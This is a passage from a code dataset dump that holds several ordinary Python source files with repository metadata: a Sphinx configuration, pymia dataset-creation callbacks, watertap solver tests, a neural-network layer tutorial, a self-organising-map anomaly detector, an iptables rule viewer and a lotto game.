hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
13948c88190e7862c9ca8494927bb8865b6216e8 | 4,919 | py | Python | _docs/source/conf.py | akaihola/importhook | 157765d2eacf036718ab8f9b7f17cf3f032bb470 | [
"MIT"
] | 8 | 2019-07-08T06:50:47.000Z | 2021-12-03T16:57:23.000Z | _docs/source/conf.py | akaihola/importhook | 157765d2eacf036718ab8f9b7f17cf3f032bb470 | [
"MIT"
] | 5 | 2020-03-09T16:57:25.000Z | 2021-03-07T17:53:21.000Z | _docs/source/conf.py | akaihola/importhook | 157765d2eacf036718ab8f9b7f17cf3f032bb470 | [
"MIT"
] | 3 | 2020-06-13T18:43:49.000Z | 2022-02-14T14:02:18.000Z | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'importhook'
copyright = '2018, Brett Langdon <me@brett.is>'
author = 'Brett Langdon <me@brett.is>'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = ''
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.githubpages',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'importhookdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'importhook.tex', 'importhook Documentation',
'Brett Langdon \\textless{}me@brett.is\\textgreater{}', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'importhook', 'importhook Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'importhook', 'importhook Documentation',
author, 'importhook', 'One line description of project.',
'Miscellaneous'),
]
# -- Extension configuration ------------------------------------------------- | 30.74375 | 79 | 0.649726 |
682d98cf9e422adb12ea708c4910e45e51cedb79 | 10,352 | py | Python | pymia/data/creation/callback.py | NunoEdgarGFlowHub/pymia | 142842e322b2f712aa45850f23f4875dc2c0f493 | [
"Apache-2.0"
] | null | null | null | pymia/data/creation/callback.py | NunoEdgarGFlowHub/pymia | 142842e322b2f712aa45850f23f4875dc2c0f493 | [
"Apache-2.0"
] | null | null | null | pymia/data/creation/callback.py | NunoEdgarGFlowHub/pymia | 142842e322b2f712aa45850f23f4875dc2c0f493 | [
"Apache-2.0"
] | null | null | null | import os
import typing
import numpy as np
import pymia.data.conversion as conv
import pymia.data.definition as defs
import pymia.data.indexexpression as expr
import pymia.data.subjectfile as subj
from . import writer as wr
class Callback:
"""Base class for the interaction with the dataset creation.
Implementations of the :class:`.Callback` class can be provided to :meth:`.Traverser.traverse` in order to
write/process specific information of the original data.
"""
def on_start(self, params: dict):
"""Called at the beginning of :meth:`.Traverser.traverse`.
Args:
params (dict): Parameters provided by the :class:`.Traverser`. The provided parameters will differ from
:meth:`.Callback.on_subject`.
"""
pass
def on_end(self, params: dict):
"""Called at the end of :meth:`.Traverser.traverse`.
Args:
params (dict): Parameters provided by the :class:`.Traverser`. The provided parameters will differ from
:meth:`.Callback.on_subject`.
"""
pass
def on_subject(self, params: dict):
"""Called for each subject of :meth:`.Traverser.traverse`.
Args:
params (dict): Parameters provided by the :class:`.Traverser` containing subject specific information
and data.
"""
pass
class ComposeCallback(Callback):
def __init__(self, callbacks: typing.List[Callback]) -> None:
"""Composes many :class:`.Callback` instances and behaves like an single :class:`.Callback` instance.
This class allows passing multiple :class:`.Callback` to :meth:`.Traverser.traverse`.
Args:
callbacks (list): A list of :class:`.Callback` instances.
"""
self.callbacks = callbacks
def on_start(self, params: dict):
"""see :meth:`.Callback.on_start`."""
for c in self.callbacks:
c.on_start(params)
def on_end(self, params: dict):
"""see :meth:`.Callback.on_end`."""
for c in self.callbacks:
c.on_end(params)
def on_subject(self, params: dict):
"""see :meth:`.Callback.on_subject`."""
for c in self.callbacks:
c.on_subject(params)
class MonitoringCallback(Callback):
def on_start(self, params: dict):
"""see :meth:`.Callback.on_start`."""
print('start dataset creation')
def on_subject(self, params: dict):
"""see :meth:`.Callback.on_subject`."""
index = params[defs.KEY_SUBJECT_INDEX]
subject_files = params[defs.KEY_SUBJECT_FILES]
print('[{}/{}] {}'.format(index + 1, len(subject_files), subject_files[index].subject))
def on_end(self, params: dict):
"""see :meth:`.Callback.on_end`."""
print('dataset creation finished')
class WriteDataCallback(Callback):
def __init__(self, writer: wr.Writer) -> None:
"""Callback that writes the raw data to the dataset.
Args:
writer (.creation.writer.Writer): The writer used to write the data.
"""
self.writer = writer
def on_subject(self, params: dict):
"""see :meth:`.Callback.on_subject`."""
subject_files = params[defs.KEY_SUBJECT_FILES]
subject_index = params[defs.KEY_SUBJECT_INDEX]
index_str = defs.subject_index_to_str(subject_index, len(subject_files))
for category in params[defs.KEY_CATEGORIES]:
data = params[category]
self.writer.write('{}/{}'.format(defs.LOC_DATA_PLACEHOLDER.format(category), index_str), data, dtype=data.dtype)
class WriteEssentialCallback(Callback):
def __init__(self, writer: wr.Writer) -> None:
"""Callback that writes the essential information to the dataset.
Args:
writer (.creation.writer.Writer): The writer used to write the data.
"""
self.writer = writer
self.reserved_for_shape = False
def on_start(self, params: dict):
"""see :meth:`.Callback.on_start`."""
subject_count = len(params[defs.KEY_SUBJECT_FILES])
self.writer.reserve(defs.LOC_SUBJECT, (subject_count,), str)
self.reserved_for_shape = False
def on_subject(self, params: dict):
"""see :meth:`.Callback.on_subject`."""
subject_files = params[defs.KEY_SUBJECT_FILES]
subject_index = params[defs.KEY_SUBJECT_INDEX]
# subject identifier/name
subject = subject_files[subject_index].subject
self.writer.fill(defs.LOC_SUBJECT, subject, expr.IndexExpression(subject_index))
# reserve memory for shape, not in on_start since ndim not known
if not self.reserved_for_shape:
for category in params[defs.KEY_CATEGORIES]:
self.writer.reserve(defs.LOC_SHAPE_PLACEHOLDER.format(category),
(len(subject_files), params[category].ndim), dtype=np.uint16)
self.reserved_for_shape = True
for category in params[defs.KEY_CATEGORIES]:
shape = params[category].shape
self.writer.fill(defs.LOC_SHAPE_PLACEHOLDER.format(category), shape, expr.IndexExpression(subject_index))
class WriteImageInformationCallback(Callback):
def __init__(self, writer: wr.Writer, category=defs.KEY_IMAGES) -> None:
"""Callback that writes the image information (shape, origin, direction, spacing) to the dataset.
Args:
writer (.creation.writer.Writer): The writer used to write the data.
category (str): The category from which to extract the information from.
"""
self.writer = writer
self.category = category
self.new_subject = False
def on_start(self, params: dict):
"""see :meth:`.Callback.on_start`."""
subject_count = len(params[defs.KEY_SUBJECT_FILES])
self.writer.reserve(defs.LOC_IMGPROP_SHAPE, (subject_count, 3), dtype=np.uint16)
self.writer.reserve(defs.LOC_IMGPROP_ORIGIN, (subject_count, 3), dtype=np.float)
self.writer.reserve(defs.LOC_IMGPROP_DIRECTION, (subject_count, 9), dtype=np.float)
self.writer.reserve(defs.LOC_IMGPROP_SPACING, (subject_count, 3), dtype=np.float)
def on_subject(self, params: dict):
"""see :meth:`.Callback.on_subject`."""
subject_index = params[defs.KEY_SUBJECT_INDEX]
properties = params[defs.KEY_PLACEHOLDER_PROPERTIES.format(self.category)] # type: conv.ImageProperties
self.writer.fill(defs.LOC_IMGPROP_SHAPE, properties.size, expr.IndexExpression(subject_index))
self.writer.fill(defs.LOC_IMGPROP_ORIGIN, properties.origin, expr.IndexExpression(subject_index))
self.writer.fill(defs.LOC_IMGPROP_DIRECTION, properties.direction, expr.IndexExpression(subject_index))
self.writer.fill(defs.LOC_IMGPROP_SPACING, properties.spacing, expr.IndexExpression(subject_index))
class WriteNamesCallback(Callback):
def __init__(self, writer: wr.Writer) -> None:
"""Callback that writes the names of the category entries to the dataset.
Args:
writer (.creation.writer.Writer): The writer used to write the data.
"""
self.writer = writer
def on_start(self, params: dict):
"""see :meth:`.Callback.on_start`."""
for category in params[defs.KEY_CATEGORIES]:
self.writer.write(defs.LOC_NAMES_PLACEHOLDER.format(category),
params[defs.KEY_PLACEHOLDER_NAMES.format(category)], dtype='str')
class WriteFilesCallback(Callback):
def __init__(self, writer: wr.Writer) -> None:
"""Callback that writes the file names to the dataset.
Args:
writer (.creation.writer.Writer): The writer used to write the data.
"""
self.writer = writer
self.file_root = None
@staticmethod
def _get_common_path(subject_files):
def get_subject_common(subject_file: subj.SubjectFile):
return os.path.commonpath(list(subject_file.get_all_files().values()))
return os.path.commonpath([get_subject_common(sf) for sf in subject_files])
def on_start(self, params: dict):
"""see :meth:`.Callback.on_start`."""
subject_files = params[defs.KEY_SUBJECT_FILES]
self.file_root = self._get_common_path(subject_files)
if os.path.isfile(self.file_root): # only the case if only one file
self.file_root = os.path.dirname(self.file_root)
self.writer.write(defs.LOC_FILES_ROOT, self.file_root, dtype='str')
for category in params[defs.KEY_CATEGORIES]:
self.writer.reserve(defs.LOC_FILES_PLACEHOLDER.format(category),
(len(subject_files), len(params[defs.KEY_PLACEHOLDER_NAMES.format(category)])), dtype='str')
def on_subject(self, params: dict):
"""see :meth:`.Callback.on_subject`."""
subject_index = params[defs.KEY_SUBJECT_INDEX]
subject_files = params[defs.KEY_SUBJECT_FILES]
subject_file = subject_files[subject_index] # type: subj.SubjectFile
for category in params[defs.KEY_CATEGORIES]:
for index, file_name in enumerate(subject_file.categories[category].entries.values()):
relative_path = os.path.relpath(file_name, self.file_root)
index_expr = expr.IndexExpression(indexing=[subject_index, index], axis=(0, 1))
self.writer.fill(defs.LOC_FILES_PLACEHOLDER.format(category), relative_path, index_expr)
def get_default_callbacks(writer: wr.Writer, meta_only=False) -> ComposeCallback:
"""Provides a selection of commonly used callbacks to write the most important information to the dataset.
Args:
writer (.creation.writer.Writer): The writer used to write the data.
meta_only (bool): Whether only callbacks for a metadata dataset creation should be returned.
Returns:
Callback: The composed selection of common callbacks.
"""
callbacks = [MonitoringCallback(),
WriteDataCallback(writer),
WriteFilesCallback(writer),
WriteImageInformationCallback(writer),
WriteEssentialCallback(writer)]
if not meta_only:
callbacks.append(WriteNamesCallback(writer))
return ComposeCallback(callbacks)
| 38.917293 | 124 | 0.660452 |
a37e3f0e6a7fe688ee02766f2e83a31e3a7cfee0 | 3,613 | py | Python | watertap/core/util/tests/test_infeasible.py | srikanthallu/watertap | 6ad5552b91163917fb19342754b9b57b3d9cbd85 | [
"BSD-3-Clause-LBNL"
] | 4 | 2021-11-06T01:13:22.000Z | 2022-02-08T21:16:38.000Z | watertap/core/util/tests/test_infeasible.py | srikanthallu/watertap | 6ad5552b91163917fb19342754b9b57b3d9cbd85 | [
"BSD-3-Clause-LBNL"
] | 233 | 2021-10-13T12:53:44.000Z | 2022-03-31T21:59:50.000Z | watertap/core/util/tests/test_infeasible.py | srikanthallu/watertap | 6ad5552b91163917fb19342754b9b57b3d9cbd85 | [
"BSD-3-Clause-LBNL"
] | 12 | 2021-11-01T19:11:03.000Z | 2022-03-08T22:20:58.000Z | ###############################################################################
# WaterTAP Copyright (c) 2021, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National
# Laboratory, National Renewable Energy Laboratory, and National Energy
# Technology Laboratory (subject to receipt of any required approvals from
# the U.S. Dept. of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#
###############################################################################
import pytest
from pyomo.environ import ConcreteModel, Var, Constraint
from idaes.core.util import get_solver
from watertap.core.util.infeasible import (
print_infeasible_constraints,
print_infeasible_bounds,
print_variables_close_to_bounds,
print_constraints_close_to_bounds,
print_close_to_bounds,
)
class TestInfeasible:
@pytest.fixture(scope="class")
def m(self):
m = ConcreteModel()
m.a = Var(bounds=(0, 10))
m.b = Var(bounds=(-10, 10))
m.abcon = Constraint(expr=(0, m.a + m.b, 10))
return m
@pytest.mark.unit
def test_var_not_set(self, m, capsys):
print_variables_close_to_bounds(m)
captured = capsys.readouterr()
assert (
captured.out
== """No value for Var a
No value for Var b
"""
)
@pytest.mark.unit
def test_var_not_set_con(self, m, capsys):
print_constraints_close_to_bounds(m)
captured = capsys.readouterr()
assert (
captured.out
== """Cannot evaluate Constraint abcon: missing variable value
"""
)
@pytest.mark.unit
def test_not_close(self, m, capsys):
m.a.value = 2
m.b.value = 2
print_close_to_bounds(m)
captured = capsys.readouterr()
assert captured.out == ""
@pytest.mark.unit
def test_close_UB(self, m, capsys):
m.a.value = 10
m.b.value = 0
print_close_to_bounds(m)
captured = capsys.readouterr()
assert (
captured.out
== """a near UB of 10
abcon near UB of 10
"""
)
@pytest.mark.unit
def test_close_LB(self, m, capsys):
m.a.value = 10
m.b.value = -10
print_close_to_bounds(m)
captured = capsys.readouterr()
assert (
captured.out
== """a near UB of 10
b near LB of -10
abcon near LB of 0
"""
)
@pytest.mark.unit
def test_infeasible_bounds_none(self, m, capsys):
print_infeasible_bounds(m)
captured = capsys.readouterr()
assert captured.out == ""
@pytest.mark.unit
def test_infeasible_constraints_none(self, m, capsys):
print_infeasible_constraints(m)
captured = capsys.readouterr()
assert captured.out == ""
@pytest.mark.unit
def test_infeasible_bounds(self, m, capsys):
m.a.value = 20
m.b.value = -20
print_infeasible_bounds(m)
captured = capsys.readouterr()
assert (
captured.out
== """VAR a: 20 </= UB 10
VAR b: -20 >/= LB -10
"""
)
@pytest.mark.unit
def test_infeasible_constraints(self, m, capsys):
m.a.value = -20
print_infeasible_constraints(m)
captured = capsys.readouterr()
assert (
captured.out
== """CONSTR abcon: 0.0 </= -40 <= 10.0
"""
)
| 28.674603 | 81 | 0.587877 |
11516f25c40aee831ef345a9fd53d3e45ef6965d | 2,145 | py | Python | 04_NEURAL_NETWORKS/cap_03_adding_layers/dense_layer.py | san99tiago/ML_BASICS | ebd51827f7dd427c848b5c8e1d4bfd017d2fb56f | [
"MIT"
] | 2 | 2021-03-18T06:07:09.000Z | 2021-05-08T22:14:14.000Z | 04_NEURAL_NETWORKS/cap_03_adding_layers/dense_layer.py | san99tiago/ML_BASICS | ebd51827f7dd427c848b5c8e1d4bfd017d2fb56f | [
"MIT"
] | null | null | null | 04_NEURAL_NETWORKS/cap_03_adding_layers/dense_layer.py | san99tiago/ML_BASICS | ebd51827f7dd427c848b5c8e1d4bfd017d2fb56f | [
"MIT"
] | null | null | null | # CODE FOR A DENSE LAYER OF NEURONS CLASS USING NUMPY
# SANTIAGO GARCIA ARANGO
import numpy as np
import nnfs
import matplotlib.pyplot as plt
from nnfs.datasets import spiral_data
# Initialize Neural Networks From Scratch package for following the book
nnfs.init(dot_precision_workaround=True, default_dtype='float32', random_seed=0)
class DenseLayer:
"""
DenseLayer is a class to create and process generalized neuron layers.
:param n_inputs: number of inputs
:param n_neurons: number of neurons
"""
def __init__(self, n_inputs, n_neurons):
# Initialize main layer with random weights and zero vector for biases
self.weights = 0.01 * np.random.randn(n_inputs, n_neurons)
self.biases = np.zeros((1, n_neurons))
def forward(self, inputs):
# Apply main forward pass with
self.output = np.dot(inputs, self.weights) + self.biases
if __name__ == "__main__":
# --------------- TEST FORWARD PASS WITH MY NEW CLASS --------------
# Create dataset
# 2D spiral size(X)=(samples*classes, 2) and size(y)=(samples*classes, 1)
# Spiral has two features in the 2D plane and specific "classes" as output
X, y = spiral_data(samples=100, classes=3)
print("\n\n---------------- MY DATASET -----------------\n")
print("shape(X):", np.shape(X), "... main training features\n")
print("shape(y):", np.shape(y), "... output for each set of features\n")
# Create dense layer with given "input features" and "output values"
dense_1 = DenseLayer(2, 3)
print("\n\n--------- DENSE LAYER INITIALIZING ----------\n")
print("shape(dense_1.weights):", np.shape(dense_1.weights), "\n")
print("shape(dense_1.biases):", np.shape(dense_1.biases), "\n")
# Perform a forward pass of our training data through this layer
dense_1.forward(X)
# See output of the first samples
print("\n\n--------- FORWARD PASS ----------\n *Only some of them...\n")
print(dense_1.output[:5])
# Visualize dataset graphically
plt.figure()
plt.scatter(X[:, 0], X[:, 1], c=y, cmap="brg")
plt.title("Santi's spiral dataset")
plt.show()
| 36.355932 | 80 | 0.64662 |
910b2fc5e7bf03bbf8e3ec1b1cbf829bb582a764 | 3,219 | py | Python | som_anomaly_detector/anomaly_detection.py | FlorisHoogenboom/som-anomaly-detector | 40a84665ec322850792015bfa84c7c287f0956f5 | [
"MIT"
] | 27 | 2017-07-27T00:13:20.000Z | 2022-03-20T13:10:15.000Z | som_anomaly_detector/anomaly_detection.py | FlorisHoogenboom/som-anomaly-detector | 40a84665ec322850792015bfa84c7c287f0956f5 | [
"MIT"
] | 3 | 2017-07-28T00:27:44.000Z | 2020-06-08T18:20:35.000Z | som_anomaly_detector/anomaly_detection.py | FlorisHoogenboom/som-anomaly-detector | 40a84665ec322850792015bfa84c7c287f0956f5 | [
"MIT"
] | 14 | 2017-11-28T04:04:28.000Z | 2022-03-20T13:10:17.000Z | import numpy as np
from sklearn.neighbors import NearestNeighbors
from som_anomaly_detector.kohonen_som import KohonenSom
class AnomalyDetection(KohonenSom):
""""
This class uses provides an specific implementation of Kohonnen Som for anomaly detection.
"""
def __init__(
self,
shape,
input_size,
learning_rate,
learning_decay=0.1,
initial_radius=1,
radius_decay=0.1,
min_number_per_bmu=1,
number_of_neighbors=3,
):
super(AnomalyDetection, self).__init__(
shape,
input_size,
learning_rate,
learning_decay,
initial_radius,
radius_decay,
)
self.minNumberPerBmu = min_number_per_bmu
self.numberOfNeighbors = number_of_neighbors
return
def get_bmu_counts(self, training_data):
"""
This functions maps a training set to the fitted network and evaluates for each
node in the SOM the number of evaluations mapped to that node. This gives counts per BMU.
:param training_data: numpy array of training data
:return: An array of the same shape as the network with the best matching units.
"""
bmu_counts = np.zeros(shape=self.shape)
for observation in training_data:
bmu = self.get_bmu(observation)
bmu_counts[bmu] += 1
return bmu_counts
def fit(self, training_data, num_iterations):
"""
This function fits the anomaly detection model to some training data.
It removes nodes that are too sparse by the minNumberPerBmu threshold.
:param training_data: numpy array of training data
:param num_iterations: number of iterations allowed for training
:return: A vector of allowed nodes
"""
self.reset()
super(AnomalyDetection, self).fit(training_data, num_iterations)
bmu_counts = self.get_bmu_counts(training_data)
self.bmu_counts = bmu_counts.flatten()
self.allowed_nodes = self.grid[bmu_counts >= self.minNumberPerBmu]
return self.allowed_nodes
def evaluate(self, evaluationData):
"""
This function maps the evaluation data to the previously fitted network. It calculates the
anomaly measure based on the distance between the observation and the K-NN nodes of this
observation.
:param evaluationData: Numpy array of the data to be evaluated
:return: 1D-array with for each observation an anomaly measure
"""
try:
self.allowed_nodes
assert self.allowed_nodes.shape[0] > 1
except NameError:
raise Exception(
"Make sure the method fit is called before evaluating data."
)
except AssertionError:
raise Exception(
"There are no nodes satisfying the minimum criterium, algorithm cannot proceed."
)
else:
classifier = NearestNeighbors(n_neighbors=self.numberOfNeighbors)
classifier.fit(self.allowed_nodes)
dist, _ = classifier.kneighbors(evaluationData)
return dist.mean(axis=1)
| 36.579545 | 98 | 0.645231 |
7c3692a5e323a3152dd65dcfb4555352d444b84f | 6,239 | py | Python | lvsm/firewall.py | khosrow/lvsm | 516ee1422f736d016ccc198e54f5f019102504a6 | [
"MIT"
] | 15 | 2015-03-18T21:45:24.000Z | 2021-02-22T09:41:30.000Z | lvsm/firewall.py | khosrow/lvsm | 516ee1422f736d016ccc198e54f5f019102504a6 | [
"MIT"
] | 12 | 2016-01-15T19:32:36.000Z | 2016-10-27T14:21:14.000Z | lvsm/firewall.py | khosrow/lvsm | 516ee1422f736d016ccc198e54f5f019102504a6 | [
"MIT"
] | 8 | 2015-03-20T00:24:56.000Z | 2021-11-19T06:21:19.000Z | """Firewall funcationality"""
import subprocess
import socket
import utils
import termcolor
import logging
logger = logging.getLogger('lvsm')
class Firewall():
def __init__(self, iptables):
self.iptables = iptables
def show(self, numeric, color):
args = [self.iptables, "-L", "-v"]
if numeric:
args.append("-n")
try:
try:
logger.info("Running: %s" % " ".join(args))
output = subprocess.check_output(args)
# python 2.6 compatibility code
except AttributeError as e:
output, stderr = subprocess.Popen(args, stdout=subprocess.PIPE).communicate()
except OSError as e:
logger.error("problem with iptables - %s : %s" % (e.strerror , args[0]))
return list()
result = ['', 'IP Packet filter rules']
result += ['======================']
if color:
for line in output.split('\n'):
if 'Chain' not in line and 'ACCEPT' in line:
result.append(termcolor.colored(line, 'green'))
elif 'Chain' not in line and ('REJECT' in line or 'DROP' in line):
result.append(termcolor.colored(line, 'red'))
else:
result.append(line)
else:
result += output.split('\n')
return result
def show_nat(self, numeric):
args = [self.iptables, "-t", "nat", "-L", "-v"]
if numeric:
args.append("-n")
try:
try:
logger.info("Running: %s" % " ".join(args))
output = subprocess.check_output(args)
# python 2.6 compatibility code
except AttributeError as e:
output, stderr = subprocess.Popen(args, stdout=subprocess.PIPE).communicate()
except OSError as e:
logger.error("Problem with iptables - %s : %s " % (e.strerror, args[0]))
return list()
result = ['', 'NAT rules', '=========']
result += output.split('\n')
return result
def show_mangle(self, numeric, color, fwm=None):
"""Show the iptables mangle table"""
args = [self.iptables, '-t', 'mangle', '-L', '-v']
if numeric:
args.append('-n')
try:
try:
logger.info("Running: %s" % " ".join(args))
output = subprocess.check_output(args)
# python 2.6 compat code
except AttributeError as e:
output, stderr = subprocess.Popen(args, stdout=subprocess.PIPE).communicate()
except OSError as e:
logger.error("Problem with iptables - %s : %s" % (e.strerror, args[0]))
return list()
result = list()
if output:
lines = output.split('\n')
# Find which column contains the destination
#header = lines[1].split()
#try:
# index = header.index('destination')
#except ValueError as e:
# index = -1
for line in lines:
tokens = line.split()
if fwm and hex(fwm) in tokens:
result.append(line)
else:
result.append(line)
result.insert(0, '')
result.insert(1, 'Mangle rules')
result.insert(2, '============')
return result
def show_virtual(self, host, port, protocol, numeric, color):
result = list()
args = [self.iptables, '-L', 'INPUT']
if port:
portnum = utils.getportnum(port)
try:
portname = socket.getservbyport(int(portnum))
except socket.error:
portname = portnum
except OverflowError as e:
logger.error("%s" % e)
return list()
if numeric:
args.append('-n')
hostnames = utils.gethostbyname_ex(host)
else:
# Turn this into a list so it behaves like the above case
# And we only perform a list membership check
hostnames = [socket.getfqdn(host)]
# Nested try/except needed to catch exceptions in the "Except"
try:
try:
logger.info("Running: %s" % " ".join(args))
output = subprocess.check_output(args)
# python 2.6 compatibility code
except AttributeError as e:
output, stderr = subprocess.Popen(args, stdout=subprocess.PIPE).communicate()
except OSError as e:
logger.error("Problem with iptables - %s : %s" % (e.strerror, args[0]))
return list()
if output:
lines = output.split('\n')
for line in lines:
# break the iptables output into tokens
# assumptions:
# 2nd item is the protocol - tokens[1]
# 5th item is the hostname - tokens[4]
# 7th item is the portname - tokens[6]
tokens = line.split()
if len(tokens) >= 7:
if ((tokens[1] == protocol or tokens[2] == "all") and
tokens[4] in hostnames and
( not port or (tokens[6] == "dpt:" + str(portname) or tokens[6] == "dpt:" + str(portnum)))
):
if color:
if line.startswith('ACCEPT'):
result.append(termcolor.colored(line, 'green'))
elif (line.startswith('REJECT') or
line.startswith('DROP')):
result.append(termcolor.colored(line, 'red'))
else:
result.append(line)
else:
result.append(line)
# If we have any output, let's also display some headers
if result:
result.insert(0, '')
result.insert(1, 'IP Packet filter rules')
result.insert(2, '======================')
return result
| 37.359281 | 114 | 0.484212 |
f353999cabd0b31f74ad52f4e235abfa57b62882 | 3,111 | py | Python | lotto_class.py | idel28102001/loto_game | fb672f6878f871bf294ff0f1f99fea2eda4aeb15 | [
"MIT"
] | null | null | null | lotto_class.py | idel28102001/loto_game | fb672f6878f871bf294ff0f1f99fea2eda4aeb15 | [
"MIT"
] | null | null | null | lotto_class.py | idel28102001/loto_game | fb672f6878f871bf294ff0f1f99fea2eda4aeb15 | [
"MIT"
] | null | null | null | import random
from lotto_funcs import rand_nums, lotto_nums, lines_lotto
def decorator(f):
def inner_func(*args, **kwargs):
line, name = f(*args, **kwargs)
print('-' * 6, name, '-' * 6)
print(line[:-2])
print('-' * 26)
return inner_func
class Bingo:
def __init__(self, name, gamer='y'):
self.name = name
self.gamer = gamer
self.nums = rand_nums()
self.lotto, self.all_nums = lotto_nums(self.nums)
@decorator
def lines_func(self, input_nums):
lines, self.won_nums = lines_lotto(self.lotto, input_nums)
return lines, self.name
def __call__(self, input_nums):
self.lines_func(input_nums)
class WholeGame:
def __init__(self):
self.answer = None
self.gamers = dict()
self.all_game = iter(random.sample(range(1, 90), 89))
self.finish_nums = []
self.done = False
self._ans = None
@property
def answer_method(self):
return self._ans
@answer_method.setter
def answer_method(self, arg):
if arg != 'y' and arg != 'n' and arg is not None:
raise NameError('Ответ должен быть y или n')
self._ans = arg
def y_n(self, msg, arg=''):
try:
self.answer_method = input(f'{msg} (y/n) ')
except NameError:
print('Вводите y или n')
return self.y_n(msg, arg)
else:
return self._ans
def __getitem__(self, item):
return self.gamers[item]
def __contains__(self, item):
return item in self[self.i][0].all_nums
def __bool__(self):
return bool(self[self.i][1])
def players(self):
answer = input('Введите имя игрока или стоп-слово(stop) ')
if answer == 'stop':
pass
else:
self.answer_method = self.y_n('Это человек?')
self.gamers[answer] = [Bingo(answer, self.answer_method), 1 if self._ans == 'y' else 0]
self.players()
def __len__(self):
return len(self.finish_nums)
def game(self):
if self.done or not int(89 - len(self)):
pass
else:
barrel = next(self.all_game)
print(f'Новый бочонок: {barrel} (осталось {abs(len(self) - 89)})')
for self.i in self.gamers:
self[self.i][0](self.finish_nums)
if 5 in self[self.i][0].won_nums:
print(f'У нас есть победитель - {self.i}!!!')
self.done = True
break
if bool(self):
self.answer_method = self.y_n('Зачеркнуть цифру?')
if (self._ans == 'y' and barrel in self) or (self._ans == 'n' and barrel not in self):
pass
else:
print('Вы проиграли')
self.done = True
self.finish_nums.append(barrel)
self.game()
def __call__(self):
self.players()
self.game()
if __name__ == '__main__':
game = WholeGame()
game()
| 27.776786 | 106 | 0.533269 |
943d262b257456b160300d08e106173ec369e225 | 2,494 | py | Python | spirit/core/tests/utils.py | igorshevk/oknoname | 0828504afb8fdae5f5e85040bec1d95cb27ce471 | [
"MIT"
